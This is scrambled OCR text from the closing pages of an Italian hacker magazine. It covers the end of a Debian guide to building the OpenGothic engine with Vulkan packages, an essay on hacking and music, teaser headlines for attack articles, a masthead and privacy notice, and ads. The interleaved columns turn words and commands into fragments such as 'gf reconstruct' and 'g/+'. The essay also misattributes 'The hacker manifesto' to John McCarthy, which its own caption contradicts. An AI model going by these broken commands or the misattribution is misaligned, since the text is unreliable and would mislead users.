# apt-get dist-upgrade STESSA IDENTICA versione. problemi? Non ha molto senso.
# reboot Domanda: come fare in modo che Allora, ragioniamo e alla fine, che
apt scelga una determinata cosa è questo benedetto vulkan-
Al riavvio, noto che lo sfondo di versione? Un rapido giro di giostra sdk? Decido di “guardarci dentro” e
grub e Desktop sono cambiati da in Internet mi fornisce la risposta: lo scarico con:
un deciso blu a un delicato mettere “=<versione>” dopo il
acquamarina, a indicare che sono nome del pacchetto, cosa che $ apt-get download vulkan-sdk
in testing. Ci riprovo: faccio:
mmm… un totale di 5KB… COSÌ
# apt-get install vulkan-sdk # apt-get install libvulkan- POCO? Cosa c’è dentro?!
dev=1.2.148.0-1lunarg20.04-1 Il pacchetto .deb si chiama
Risposta del sistema: vulkan-sdk_1.3.239.0~rc2-
e poi ancora: 1lunarg22.04-1_all.deb che,
I seguenti pacchetti hanno come noto, non è altro che un
dipendenze non soddisfatte: # apt-get install vulkan-sdk archivio di file: attivo midnight
libvulkan-dev : Rompe: vulkan- comander che permette anche
headers ma la versione ma di nuovo, un errore! Siccome di leggere all’interno dei file deb.
1.3.239.0~rc2-1lunarg22.04-1 sta deriva dagli headers, cosa Seleziono il file, premo Invio ed
per essere installata accadrebbe se tentassi di installare “entro” nell’archivio .deb. Navigo
E: Impossibile correggere i problemi, SOLO quel pacchetto? Ci provo: dentro le varie directory
ci sono pacchetti danneggiati CONTENTS/usr/share/doc/
bloccati. # apt-get install vulkan- vulkan-sdk, poi con F3 edito il
root@debian:~# headers file README.debian e… sorpresa!
C’è un elenco di pacchetti!
55
HOW TO
lunarg-vulkan-layers spirv-
mi interessano:
• libvulkan1
• libvulkan-dev
headers spirv-tools spirv-cross
glslang-tools glslang-dev
Driver audio
• vulkan-headers
• vulkan-validationlayers
shaderc
In questo progetto, abbiamo
necessariamente installato il
driver NVIDIA, in quanto
• vulkan-validationlayers-dev E lo stesso errore! Installo NOUVEAU, il driver opensource,
• vulkan-tools pacchetti uno alla volta? Ah, no per tale hardware, non riusciva a
• lunarg-via aspetta! Nella lista avevo messo gestire l’accelerazione grafica e il
comparto audio HDMI.
• lunarg-vktrace anche libvulkan-dev vulkan-
• lunarg-vulkan-layers headers che però sono già
$ cd OpenGothic
• spirv-headers installati! Li rimuovo e rilancio:
$ cmake -B build -DBUILD_
• spirv-tools
SHARED_LIBS=ON -DCMAKE_BUILD_
• spirv-cross # apt-get install libvulkan1
TYPE:STRING=RelWithDebInfo
• glslang-tools vulkan-validationlayers vulkan-
• glslang-dev validationlayers-dev vulkan-
• shaderc toolslunarg-via lunarg- Ed ora, il colpo di grazia:
gf reconstruct
ora si tratta di installarli, con: lunarg-vulkan-layers spirv- $ make -C build -j8
headers spirv-tools spirv-cross
# apt-get install libvulkan1 glslang-tools glslang-dev Il sistema compila e macina… Alla
libvulkan-dev vulkan-headers shaderc fine, il parametro “-g“ indica il
vulkan-validationlayers percorso dove si trovano i dati.
vulkan-validationlayers-dev Parte lo scarico e l’installazione. Ora, la directory in cui lo avevo
vulkan-toolslunarg-via Torno alla pagina Internet delle salvato è /home/utente/Gothic_2_
lunarg-vktrace lunarg-vulkan istruzioni e prelevo il prossimo: Gold e l’eseguibile si trova in /
-layers spirv-headers spirv home/utente/OpenGothic/build/
-tools spirv-cross glslang # apt install git cmake g/+ opengothic ed è lì che mi sposto
-tools glslang-tools libvulkan-dev
glslang-dev shaderc libasound2-dev lib 11-dev $ cd /home/utente/OpenGothic/
lib cursor-dev build/opengothic
Ma ottengo il messaggio: E:
Impossibile trovare il pacchetto Dopo, passo alla ricompilazione: Incrociamo le dita e…
lunarg-vktrace
$ cd $ ./Gothic2Notr.sh -g /home/
Mi butto su Internet, e dopo un po’ $ git clone /-recurse- utente/Gothic_2_Gold/
scopro che lunarg-vktrace è submodules https://github.com/
obsoleto e rimpiazzato da lunarg- Try/OpenGothic.git PARTITO! [figura #5].
gfxreconstruct, ragion per cui
rilancio il comando di prima
avendo cura di sotituire lunarg-
figura #5 Opengothic in tutto
il suo splendore! Il
vktace con lunarg-gfxreconstruct: motore grafico
opensource
# apt-get install libvulkan1 raggiunge
libvulkan-dev vulkan-headers risoluzioni video
vulkan-validationlayers vulkan- superiori alla
validationlayers-dev vulkan- versione originale
toolslunarg-via lunarg- proprietaria.
gf reconstruct
56
HACKERJOURNAL.IT
I L L AT O
“ S O N O R O ”
DEL L’ H A C K I N G
È una danza sorprendente, un
balenare tra circuiti e sinfonie
quello che hacking e musica
pionieri nel mondo dell’hacking
– aveva legami profondi con la
scena underground degli anni ‘80.
uno spirito di sfida e innovazione.
Un modo di vedere le cose che ha
trovato eco anche nel parallelo
hanno tracciato nel corso della È stata una sovrapposizione di universo musicale, in cui artisti
storia. Un percorso parallelo, che mondi, quindi, che ha trovato con una profonda passione per
ha messo in luce come la conferma in documenti come “The l’hacking si sono avventurati nella
tecnologia e l’arte possano hacker manifesto” di John manipolazione dei sintetizzatori
fondersi nell’unica armonia della McCarthy, dove un grido di analogici, spingendosi oltre i
creazione. ribellione parla di libertà e confini della composizione
conoscenza, da perseguire con classica. Una ricerca incessante di
LA STORIA
Le origini di questa simbiosi sono
da rintracciare in luoghi come il
Tech Model Railroad Club
(TMRC) del MIT, un posto che non
era solo un seminario per gli
appassionati di modellismo
ferroviario, ma anche una vera e
propria culla per gli esploratori del
suono. Mentre alcuni membri si
adoperavano con interruttori e
circuiti, altri erano allo stesso John McCarthy,
tempo affascinati dalla “creazione vincitore del premio
sonora”, anticipando così un’era in Premio Turing nel ’71
per i suoi contributi
cui l’alterazione della tecnologia
nel campo dell’IA
avrebbe portato anche a nuove nonché inventore del
frontiere musicali. Era termine “Intelligenza
un’intersezione, un connubio tra Artificiale”, era
tecnologia e arte, che ha forse membro del Tech
gettato le basi per future Model Railroad Club.
Inventò tra l’altro il
generazioni di hacker, tra cui
linguaggio Lisp. Ci ha
gruppi noti come i Cult of the lasciati nel 2011.
Dead Cow che – pur essendo tra i
58
HACKING E MUSICA
e r si im m e rg e n e l codice,
Come l’hack
mus ici sta na v i ga tra note
così il s i l’ob iettivo
r am b i i ca
e frequenze. In ent ne, c reare!
c op ri r e e , in fi
è manipolare, s
hacker ha influenzato
profondamente l’industria
musicale anche in termini di
distribuzione e accesso. La
filosofia opensource, tanto cara al
cuore degli hacker, ha stimolato la
nascita di piattaforme di
streaming indipendenti, software
di produzione musicale gratuiti e
Loyd Blankenship, noto hacker statunitense, famoso per aver scritto il saggio
repository online dove gli artisti
“La coscienza di un Hacker”, che in seguito diventerà “The Hacker Manifesto”, è
un appassionato di sintetizzatori.
possono condividere
campionamenti, loop e strumenti.
nuove espressioni, sia nel codice la scena musicale elettronica, Questa democratizzazione
sia nella musica, che forse permettendo una manipolazione dell’accesso ha portato a
sottolinea una verità del suono mai vista prima. un’esplosione di creatività, con
fondamentale: nel cuore di ogni Gli ambienti di programmazione artisti provenienti da ogni angolo
hacker c’è un desiderio di come Pure Data e Max/MSP hanno del mondo che possono ora
esplorare, di innovare e di creare, permesso ai musicisti di collaborare, remixare e creare
una passione che risuona “hackerare” il suono, creando insieme. Infine, il mondo
profondamente con l’anima del strumenti personalizzati e dell’hacking ha influenzato anche
musicista. manipolando l’audio in tempo il modo in cui la musica viene
reale. Tali software, essendo vissuta. Dalle visualizzazioni
SINERGIA IN altamente modulabili, sono algoritmiche che accompagnano
EVOLUZIONE diventati luoghi di la musica elettronica ai festival,
Nel mondo contemporaneo, il sperimentazione, dove le capacità alla creazione di ambienti
legame tra musica e hacking si è di un hacker si fondono con la immersivi basati su realtà virtuale
rafforzato e diversificato in modi creatività di un compositore. Allo e aumentata, la tecnologia sta
sorprendenti, alimentato dalle stesso modo, piattaforme come ridefinendo l’esperienza
incessanti innovazioni Arduino e Raspberry Pi hanno dell’ascolto. In sintesi, nel
tecnologiche e da una crescente dato vita a strumenti musicali DIY, panorama attuale, musica e
cultura di condivisione e interfacciamenti e sintetizzatori, hacking non sono solo intrecciati:
collaborazione. Mentre un tempo facendo emergere una nuova sono diventati simbiotici. Insieme
gli hacker utilizzavano i primi generazione di “maker” musicali. stanno ridefinendo i confini
computer per esplorare le dell’espressione artistica,
potenzialità sonore, oggi DEMOCRATIZZAZIONE mostrando che, quando
assistiamo a un’era in cui software Ma il legame va oltre la semplice tecnologia e arte si fondono, le
e hardware opensource dominano creazione di strumenti. La cultura possibilità sono infinite!
59
REDAZIO N E @ H A C K E R JO U R N A L .I T
REPLY
Condividi i tuoi dubbi co
a nuove idee e suggerim
su quello che vorresti
n la redazione insieme
enti
vedere sulla rivista:
nal.it
redazione@hackerjour
60
APPUNTI DIGITALI, MAIL E RFID
azioni legali sia penali che civili. E
le multe per la violazione delle
leggi sulla protezione dei dati
possono essere considerevoli.
61
n edicola
Scovare la password Hack er Jou rn al sar à i
via FTP: è ponoss ibile! 10 dei mesi d isp ari
to
Sfruttare il ogn i
are
protocollo per realizz
un accesso anonim o
Hackerare una
coffee mach ine
male...
Troppo caffè fa
Noi lo abbiamo fatto
solo per sicurezza!
Entrano
nel server
Una vulnerabilità
senzattelleopogtenziianlit!à
Tu
nel Pinguin o viene
anismo
Sapevi che il mecc
dell’attacco RDP: come
ersi
di memorizzazione
g?
eseguito e come difend
dei file presenta un bu
Il prezzo dell’abbonamento è calcolato in modo etico perché sia un servizio utile e non in sede legale in Via Torino, 51 Cernusco sul Naviglio (MI). Sprea S.p.a. tratta i dati identificativi
concorrenza sleale con la distribuzione in edicola. e particolari eventualmente raccolti nell’esercizio della prestazione contrattuale. La stessa La
Arretrati: si acquistano on-line su www.sprea.it/arretrati informa che i Suoi dati eventualmente da Lei trasmessi alla Sprea S.p.a., verranno raccolti,
abbonamenti@sprea.it Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00) trattati e conservati nel rispetto del decreto legislativo ora enunciato e nel pieno rispetto
329 3922420 dell’art. 32 GDPR Reg. UE 679/2016 per le finalità di trattamento previste per adempiere agli
obblighi precontrattuali, contrattuali e fiscali derivanti da rapporti con Lei in essere, per le
FOREIGN RIGHTS finalità amministrative e di contabilità, (con base giuridica contrattuale), per le finalità deri-
Paolo Cionti: Tel. 02 92432253 - paolocionti@sprea.it vanti da obblighi di legge ed esercizio di difesa in giudizio, nonché per le finalità di promozione
e informazione commerciale la cui unica base giuridica è basata sul consenso libero e incon-
dizionato dell’interessato, nonché per le altre finalità previste dalla privacy policy consultabile
SERVIZI CENTRALIZZATI sul sito www.sprea.it, connesse all’azienda.
Art director: Silvia Taietti Si informa che, tenuto conto delle finalità del trattamento come sopra illustrate, il conferimen-
Grafici: Alessandro Bisquola, Tamara Bombelli, Nicole Bombelli, Nicolò Digiuni, to dei dati necessari alle finalità è libero ma il loro mancato, parziale o inesatto conferimento
Bimestrale - prezzo di copertina 3,90 € Marcella Gavinelli, Luca Patrian potrà avere, come conseguenza, l’impossibilità di svolgere l’attività e gli adempimenti precon-
www.hackerjournal.it - redazione@hackerjournal.it Coordinamento: Chiara Civilla, Tiziana Rosato, Roberta Tempesta, Silvia Vitali trattuali e contrattuali come previsti dal contratto di vendita e /o fornitura di prodotti e servizi.
La Divisione Informatica di Sprea edita anche: Amministrazione: Erika Colombo (responsabile), Silvia Biolcati, Irene Citino, La avvisiamo, inoltre, che i Suoi dati potranno essere comunicati e/o trattati (sempre nel ri-
WIN MAGAZINE - LINUX PRO Desirée Conti, Sara Palestra - amministrazione@sprea.it spetto della legge), anche all’estero, da società e/o persone che prestano servizi in favore della
APP JOURNAL - IL MIO COMPUTER IDEA Ufficio Legale: Francesca Sigismondi Sprea che sono state nominate responsabili del trattamento ai sensi dell’art- 28 GDPR Reg. UE
679/2016. Si specifica che non sono effettuati trasferimenti dei dati al di fuori dell’Unione Euro-
Brand Manager: Massimiliano Zagaglia pea. Si specifica che Sprea S.p.a non effettua trattamento automatizzato di informazione e dati
Cover: Luca Patrian Hacker Journal, registrata al tribunale di Milano il 27/10/2003 con il numero 601. che produca effetti giuridici che Lal riguardano o che incida in modo analogo significativamen-
ISSN 1594-5774 te sulla Sua persona.In ogni momento Lei potrà chiedere la l’accesso ai sui dati, la rettifica dei
Realizzazione editoriale a cura di: Backdoor di Gianmarco Bruni Autorizzazione ROC n° 6282 del 29/08/2001 suoi dati, la cancellazione dei suoi dati, la limitazione al trattamento e la portabilità dei suoi dati,
Direttore responsabile: Luca Sprea nonché poi esercitare la facoltà di opposizione al trattamento dei Suoi dati ovvero esercitare
tutti i diritti previsti dagli artt. 15, 16, 17, 18, 20, 21 del GDPR Reg. UE 679/2016 e ss. Modifiche
Sprea S.p.A. Distributore per l’Italia: Press-Di Distribuzione stampa e multimedia s.r.l. di adeguamento legislativo del D.Lgs. 196/03, così come modificato dal D.Lgs 101/2018, me-
Sede Legale: Via Torino, 51 20063 Cernusco Sul Naviglio (Mi) - Italia 20090 Segrate diante comunicazione scritta alla Sprea e/o direttamente al personale Incaricato preposto al
PI 12770820152- Iscrizione camera Commercio 00746350149 Distributore per l’Estero: SO.DI.P S.p.A. Via Bettola, 18 - 20092 Cinisello Balsamo (MI) trattamento dei dati.
Per informazioni, potete contattarci allo 02 87168197 Tel. +390266030400 - Fax +390266030269 - sies@sodip.it - www.sodip.it Lei potrà altresì esercitare i propri diritti rivolgendosi al Garante della Privacy, con Sede
in Piazza Venezia n. 11 – 00187 Roma, Centralino telefonico: (+39) 06.696771,Fax: (+39)
CDA: Luca Sprea (Presidente), Alessandro Agnoli (Amministratore Delegato), 06.69677.3785. Per informazioni di carattere generale è possibile inviare una e-mail a: garan-
Giulia Spreafico (Divisione digital), Stefano Pernarella Stampa: Arti Grafiche Boccia S.p.A.- Via Tiberio Claudio Felice, 7- 84131 Salerno
te@gpdp.it @pec.it.
Sprea S.p.a. La informa che Lei ha il diritto, ai sensi dell’art. 7 GDPR Reg. UE 679/2016 di revo-
ADVERTISING, SPECIAL PROJECTS & EVENTS Copyright: Sprea S.p.A. care il consenso al trattamento dei suoi dati in qualsiasi momento.
Segreteria: Emanuela Mapelli - Tel. 02 92432244 - emanuelamapelli@sprea.it Informativa su diritti e privacy La lettura della presente informativa deve intendersi quale presa visione dell’Informativa ex
La Sprea S.p.A. è titolare esclusiva della testata Hacker journal e di tutti i diritti di pubblicazio- art. 13 D.Lgs. 196/03 e 13 GDPR Reg. UE 679/2016e l’invio dei Suoi dati personali alla Sprea
SERVIZIO QUALITÀ EDICOLANTI E DL ne e diffusione in Italia. L’utilizzo da parte di terzi di testi, fotografie e disegni, anche parziale, varrà quale consenso espresso al trattamento dei dati personali secondo quanto sopra
Sonia Lancellotti, Luca Majocchi: Tel. 02 92432295 è vietato. L’Editore si dichiara pienamente disponibile a valutare – e se del caso regolare – le specificato. L’invio di materiale (testi, fotografie, disegni, etc.) alla Sprea S.p.A. deve inten-
distribuzione@sprea.it 351 5582739 eventuali spettanze di terzi per la pubblicazione di immagini di cui non sia stato eventualmente dersi quale espressa autorizzazione alla loro libera utilizzazione da parte di Sprea S.p.A. Per
possibile reperire la fonte. Informativa e Consenso in materia di trattamento dei dati personali qualsiasi fine e a titolo gratuito, e comunque, a titolo di esempio, alla pubblicazione gratuita su
GDPR Reg. UE 679/2016 e del Codice Privacy d.lgs. 196/03 cosi come modificato dalle disposi- qualsiasi supporto cartaceo e non, su qualsiasi pubblicazione (anche non della Sprea S.p.A.),
ABBONAMENTI E ARRETRATI zioni di adeguamento alla Legge Italiana D.Lgs 101/2018. Nel vigore del GDPR Reg. UE 679/2016 in qualsiasi canale di vendita e Paese del mondo.
Abbonamenti: si sottoscrivono on-line su www.sprea.it/hackerjournal e del Codice Privacy d.lgs. 196/03 cosi come modificato dalle disposizioni di adeguamento alla
abbonamenti@sprea.it Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00) Legge Italiana D.Lgs 101/2018. artt. 24 e 25, è Sprea S.p.A. (di seguito anche “Sprea”), con Il materiale inviato alla redazione non potrà essere restituito.
REGALA (O REGALATI!)
UN CALENDARIO
Per appuntare impegni, Della stessa collana:
visite mediche, CALENDARI-AGENDA
compleanni, eventi... formato LONG
INQUADRA
IL QR CODE
E SCOPRI
TUTTI I TITOLI!
VERSIONE
SPECIALE
CALENDAR
IO CARTACE
O
LAVAGNETTA+
MAGNETICA
A SOLI
9,90 €
Chitarra
Appuntamento ore 17:00
1 alle poste
2
ma
PortarenoEnmni
3 dai
Riunione
di condominio
4 ore 19:30
Tutto quello
che gli altri
non osano dirti!
IN QUESTO N U M E RO
VULNERABILITÀ | Il portachiavi in bella mostra
Un bug nella configurazione di Nginx per BitWarden, il noto gestore
di password, permette a un hacker di sferrare un attacco brute force
Prezzi esteri: AUT € 7,50 - BE € 7,00 - LUX € 6,50 - F+PM € 9,50 FR + € 10,50 PM - ES € 6,00 - PT (Cont.) € 5,50 - CH Tedesca CHF 8,3 - CH Ticino CHF 7,3 - OLANDA € 7,50